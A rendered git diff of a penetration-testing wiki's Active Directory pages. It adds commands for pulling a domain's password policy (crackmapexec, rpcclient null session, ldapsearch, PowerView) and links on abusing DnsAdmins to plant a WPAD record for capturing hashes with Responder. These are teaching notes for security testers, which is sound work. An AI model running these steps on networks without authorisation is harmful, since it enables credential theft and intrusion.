* Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) * Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)

View file

@ -59,6 +59,10 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
``` ```
{% endcode %} {% endcode %}
## References
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original"> <img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.

View file

@ -23,11 +23,24 @@ Notice that you **could lockout some accounts if you try several wrong passwords
### Get password policy ### Get password policy
If you have some user credentials or a shell as a domain user you can get the password policy with: If you have some user credentials or a shell as a domain user you can **get the password policy with**:
* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol` ```bash
* `enum4linx -u 'username' -p 'password' -P <IP>` # From Linux
* `(Get-DomainPolicy)."SystemAccess" #From powerview` crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linx -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### Exploitation ### Exploitation

View file

@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names. Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\ After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
## **AD Recycle Bin** ## **AD Recycle Bin**